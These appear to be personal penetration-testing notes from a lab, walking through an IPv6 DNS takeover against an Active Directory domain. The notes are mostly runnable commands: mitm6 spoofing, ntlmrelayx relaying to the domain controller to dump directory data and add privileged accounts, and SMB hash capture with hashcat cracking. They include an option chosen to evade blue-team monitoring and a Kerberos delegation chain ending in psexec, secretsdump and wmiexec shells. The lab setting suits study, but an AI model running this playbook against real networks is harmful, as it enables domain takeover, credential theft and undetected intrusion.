- set mimt6 to start listening to ipv6 requests in the network and it will spoof it
sudo python ~/tools/mitm6/mitm6/mitm6.py -d marvel.local
- example if we restart any machine we will see spoofing is done and at machine side:
- and this is the attack ipv6 address
- set ntlmrelayx so after spoofing you will relay to the target :
sudo ntlmrelayx.py -6 -t ldaps://192.168.17.138 -wh evil.marvel.local -l loots
-6 : ipv6
-t : target you want to relay on , i.e : DC
-wh: for WPAD host, specifying your fake wpad to serve
-l : save loots directory
- in the example we are targeting the domain controller
- wait until any machine reboots or any ipv6 action happens in the network
- and at ntlmrelayx side :
- and it dumped a lot of things here users,groups,etc
- remember we have put SQL service in the description we can see it now
- now if an administrator logs in to this machine we just spoofed , mimt6 will authenticate with LDAP to the DC and create for us a new user with special ACL
you can also capture hashes when you spoofed the dns server , that can be done when any user try to access any share will get back to you allowing you to capture the user hash ==( same as responder but instead using LLMNR will use ipv6)==
# Set your spoofer
sudo python3 mitm6.py -d marvel.local
# Set your smbserver
smbserver.py -smb2support SMB .
Then you can try to crack it with :
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
- using the option
--no-ra
for (not advertise ourselves) to avoid blue team monitoring
sudo python ~/tools/mitm6/mitm6/mitm6.py -d marvel.local --no-ra
- Kerberos delegation attack
sudo ntlmrelayx.py -ts -6 -t ldaps://<dc-ip> -wh evil.marvel.local --add-computer --delegate-access
# ldap server is usually the domain controller itself
-ts : Adds timestamp to every logging output
--add-computer: Attempt to add a new computer account
--delegate-access : Delegate access on relayed computer account to the specified account
Once a computer restarted and we spoofed the DHCPv6 successfully , we will add a new computer with a random name and allow impersonate users on it with the options we have specfied
getST.py -spn cifs/<spoofed-computer>.lab.local lab.local/<new-compuer>\$ -impersonate <domain-username>
# ex : getST.py -spn cifs/ws02.lab.local lab.local/ULRRDUA\$ -impersonate lkys
export KRB5CCNAME=lkys.ccache
we can now access file system or get an interactive shell using this ticket :
psexec.py -k ws02.lab.local -debug -no-pass
secretsdump.py -k ws02.lab.local -no-pass
wmiexec.py -k -no-pass -debug ws02.lab.local
smbclient -k //ws02.lab.local/c$
https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/